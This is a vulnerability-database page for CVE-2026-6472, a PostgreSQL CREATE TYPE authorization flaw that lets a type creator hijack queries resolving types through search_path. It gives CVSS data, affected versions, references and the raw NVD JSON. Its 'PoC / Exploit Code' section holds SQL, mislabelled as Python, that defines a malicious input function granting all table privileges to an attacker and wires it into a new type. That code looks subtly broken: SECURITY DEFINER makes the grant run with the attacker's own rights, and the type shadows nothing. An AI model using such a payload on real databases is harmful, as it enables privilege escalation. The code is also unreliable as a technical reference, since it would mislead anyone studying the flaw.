CVE-2026-6472

Description

Missing authorization in PostgreSQL CREATE TYPE allows an object creator to hijack other queries that use search_path to find user-defined types, including extension-defined types. That is to say, the victim will execute arbitrary SQL functions of the attacker's choice. Versions before PostgreSQL 18.4, 17.10, 16.14, 15.18, and 14.23 are affected.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

PostgreSQL < 18.4

PostgreSQL < 17.10

PostgreSQL < 16.14

PostgreSQL < 15.18

PostgreSQL < 14.23

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

-- Step 1: Create a malicious function that executes arbitrary SQL
CREATE OR REPLACE FUNCTION public.evil_type_in(cstring) RETURNS int4 AS $$
BEGIN
    -- Example malicious action: Grant privileges to attacker
    EXECUTE 'GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO attacker';
    RETURN 1;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;

-- Step 2: Create a type that uses the malicious function
-- Assuming the victim looks for a type that resolves via search_path
CREATE TYPE public.hijacked_type (
    INPUT = public.evil_type_in,
    OUTPUT = int4out,
    RECEIVE = int4recv,
    SEND = int4send,
    INTERNALLENGTH = 4,
    PASSEDBYVALUE,
    ALIGNMENT = int4_align,
    STORAGE = plain
);

-- Step 3: Wait for victim to execute a query that implicitly uses this type
-- e.g., a function or query that casts to 'hijacked_type' via search_path

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6472
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6472
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6472/
[4] VulDB https://vuldb.com/cve/CVE-2026-6472
[5] https://www.postgresql.org/support/security/CVE-2026-6472/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6472", "sourceIdentifier": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "published": "2026-05-14T14:16:24.757", "lastModified": "2026-05-14T16:21:23.190", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing authorization in PostgreSQL CREATE TYPE allows an object creator to hijack other queries that use search_path to find user-defined types, including extension-defined types.  That is to say, the victim will execute arbitrary SQL functions of the attacker's choice.  Versions before PostgreSQL 18.4, 17.10, 16.14, 15.18, and 14.23 are affected."}], "metrics": {"cvssMetricV31": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://www.postgresql.org/support/security/CVE-2026-6472/", "source": "f86ef6dc-4d3a-42ad-8f28-e6d5547a5007"}]}}